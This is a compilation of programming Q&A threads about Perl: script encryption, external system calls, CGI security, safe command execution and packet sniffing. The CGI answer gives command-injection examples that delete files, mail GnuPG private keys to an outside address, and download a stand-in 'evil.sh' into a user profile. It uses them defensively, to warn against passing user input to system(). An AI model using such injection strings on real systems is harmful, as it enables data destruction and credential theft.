Encrypted perl scripts by Filter::Crypto (crypt_file) usage on other machines - perl

I'm trying to use Filter::Crypto module, but I'm little bit struggling with it. I would like to encrypt a script
crypt_file script.pl > encrypted_script.pl
and then use that encrypted script on another machine.
When I use
pp -f Crypto -M Filter::Crypto::Decrypt -o encrypted_script encrypted_script.pl
created binary works fine - it contains key for decryption. But I want to use just the encrypted_script.pl file. I would like to provide fully functional encrypted perl script, which nobody would be able to decrypt (easily). Is it even possible?

You're talking about digital rights management, although you may not know it.
Encrypting something so it's really hard to read is relatively easy. Doing so at the same time as allowing someone to read it, but only when you say so is really difficult. (as in, basically impossible without control over the target infrastructure, at which point it's largely academic anyway)
That goes double when you're trying to use an interpreted language like perl, because obfuscation tricks have to be de-obfuscated before you can run them.
The module explains some of this, and has some mechanisms to make it slightly harder, but at a pretty fundamental level - it's impossible to do exhaustively.

Related

Is there a perl OpenSSL EVP Key Derivation Function with MD5 support?

Background
Yahoo Finance recently (Nov-2022?) started encrypting their returns from queries such as: curl --silent --output - https://finance.yahoo.com/quote/t.
I found some Python code that will decode this in https://github.com/ranaroussi/yfinance/blob/main/yfinance/data.py#L49
Since Python is an Algol-like language, I was hoping it would be a quick port.
Here is where I hit a snag: https://github.com/ranaroussi/yfinance/blob/main/yfinance/data.py#L82
I was hoping for some relief from an existing perl module, such as Crypt::OpenSSL::FASTPBKDF2.
I know just enough about cryptography to hurt myself.
My question(s):
Is there a straightforward port for the Python function EVPKDF? It seems so close, except for the hashAlgorithm="md5" portion of EVPKDF(password, salt, keySize=32, ivSize=16, iterations=1, hashAlgorithm="md5").
The Crypt::OpenSSL::FASTPBKDF2 module doesn't seem to support md5. I know that md5 was defeated over a decade ago, but it seems to be what Yahoo is dishing out, based on the Python code.
Any thoughts are welcome.
My goal is to get the data, and I am not above using a system("openssl kdf..."); call. Not this time, anyway.

Using system commands in Perl instead of built in libraries/functions [duplicate]

This question already has an answer here:
Using Perl modules vs. using system() calls
(1 answer)
Closed 9 years ago.
On occasion I see people calling the system grep from Perl (and other scripting languages for that matter) instead of using the built-in language facilities/libraries to parse files. I would like to encourage people to use the built-in facilities and I want to solicit some reasons as to why it is good practice to use the built-in tools. I can think of some such as
Using libraries/language facilities is faster. Performance suffers due to the overhead of executing external commands.
Sticking to language facilities is more portable.
any other reasons?
On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?
Actually, when it matters, a specialized tool can be faster.
The real gains of keeping the work in Perl are:
Portability (even between machines with the same OS).
Ease of error detection.
Flexibility in handling of errors.
Greater customizability/flexibility.
Fewer "moving parts". (Are you sure you correctly escaped everything and setup the environment correctly?)
Less expertise needed. (You don't need to know both Perl and the external tools (and their ports) to code and maintain the program.)
On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?
Possibly. You can configure some shells to exit if any program returns an unsuccessful error code. This can make some scripts quite robust. For example, I have a couple of bash scripts featuring the line
trap 'e=$? ; echo "Error." ; exit $e' ERR
"On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?"
Risking the wrath of Perl hardliners here. But for me there is an easy reason to use system grep instead of perl grep: I know its syntax.
Same reason to use a Perl script instead of a bash script: I know how to do stuff in Perl and never bothered with bash script syntax.
And as we are talking scripts here, my main concern is getting it done fast and reliable (and readable). At work i do not have to bother with portability as all production is done on the very same system, down to the same software versions of everything for the whole product lifespan.
At home i do not have to care about lifetime or whatever either as the script most likely is single-purpose.
And in neither case i care about performance or software security as i would be using C++ or something else for commercial software or in time or memory limited scenarios.
edit: Not saying these reasons would apply to anyone, or even anyone else. But while in reality i know how to use Perls grep, i really have no idea how to write a bash script and most likely never will. Just putting a few lines in Perl is always faster for me.
Using external tools lead to do more error.
Moreover you have you to parse the results (if any) of the external command, which is an other source of error.
No need to say that it is bad in terms of security.

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on <the_message> ; Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
A slightly deeper look
Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug and harden and augment it because it had some horrible buffer over flow issues left right and center, non-existant utf-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

Executing system commands safely while coding in Perl

Should one really use external commands while coding in Perl? I see several disadvantages of it. It's not system independent plus security risks might also be there. What do you think? If there is no way and you have to use the shell commands from Perl then what is the safest way to execute that particular command (like checking pid, uid etc)?
It depends on how hard it is going to be to replicate the functionality in Perl. If I needed to run the m4 macro processor on something, I'd not think of trying to replicate that functionality in Perl myself, and since there's no module on http://search.cpan.org/ that looks suitable, it would appear others agree with me. In that case, then, using the external program is sensible. On the other hand, if I needed to read the contents of a directory, then the combination of readdir() et al plus stat() or lstat() inside Perl is more sensible than futzing with the output of ls.
If you need to execute commands, think very carefully about how you invoke them. In particular, you probably want to avoid the shell interpreting the arguments, so use the array form of system (see also exec), etc, rather than a single string for the command plus arguments (which means the shell is used to process the command line).
Executing external commands can be expensive simply because it involves forking new process and watching for its output if you need it.
Probably more importantly, should external process fail for any reason, it may be difficult to understand what happened by means of your script. Worse still, surprisingly often external process can be stuck forever, so will be your script. You can use special tricks like opening pipe and watching for output in loop, but this itself is error-prone.
Perl is very capable of doing many things. So, if you stick to using only Perl native constructs and modules to accomplish your tasks, not only it will be faster because you never fork, but it will be more reliable and easier to catch errors by looking at native Perl objects and structures returned by library routines. And of course, it will be automatically portable to different platforms.
If your script runs under elevated permissions (like root or under sudo), you should be very careful as to what external programs you execute. One of the simple ways to ensure basic security is to always specify commands by full name, like /usr/bin/grep (but still think twice and just do grep by Perl itself!). However, even this may not be enough if attacker is using LD_PRELOAD mechanism to inject rogue shared libraries.
If you are willing to go very secure, it is suggested to use tainted check by using -T flag like this:
#!/usr/bin/perl -T
Taint flag will be also enabled by Perl automatically if your script was determined to have different real and effective user or group ids.
Tainted mode will severely limit your ability to do many things (like system() call) without Perl complaining - see more at http://perldoc.perl.org/perlsec.html#Taint-mode, but it will give you much higher security confidence.
Should one really use external commands while coding in Perl?
There's no single answer to this question. It all depends on what you are doing within the wide range of potential uses of Perl.
Are you using Perl as a glorified shell script on your local machine, or just trying to find a quick-and-dirty solution to your problem? In that case, it makes a lot of sense to run system commands if that is the easiest way to accomplish your task. Security and speed are not that important; what matters is the ability to code quickly.
On the other hand, are you writing a production program? In that case, you want secure, portable, efficient code. It is often preferable to write the functionality in Perl (or use a module), rather than calling an external program. At least, you should think hard about the benefits and drawbacks.

Perl network frame/packet parser

I am writing a small sniffer as part of a personal project. I am using Net::Pcap (really really great tool).
In the packet-processing loop I am using the excellent Net::Frame for unpacking all the headers and getting at the data. I am getting concerned that this might not be terribly efficient (Net::Frame is great but seems to be more than I need for this project).
Also I dislike that for some Debian systems I had to manually compile libdumbnet (the package provided in the official apt repositories didn't seem to work, Net-Libdnet-0.92 didn't like it).
All I want is to get at the payload inside a TCP segment. Is there any alternative ?
Thank you.
P.S. Would it be really really bad (read "thedailywtf.com worthy") if I just took the packet and searched it for some pattern ?
I recently wrote a PCAP dump file unpacker in C and then afterwards wished I'd just used the open source libraries instead (when I realised they existed and were so easy to use). I have to say that as it's a binary file format it's probably easier to do in C than Perl, but I'll no doubt get boo'ed by all the Perl fanatics out there.
What I will say is that using existing code will be quicker all round than coding it yourself, but if you really really want to, the file format is freely available online and is really quite simple.
As for searching for a pattern, it almost certainly won't work. It's a binary file format and the packets can be fragmented and/or duplicated, so the only reliable way to know where a message starts and ends is by unpacking the headers, checking the packet flags, reading the content length field, etc. etc. Doing pattern searches may work 90% of the time, but at some point you'll find a packet capture log that means you need to change your code. And then a while later find another packet that means another change, and so on and so forth.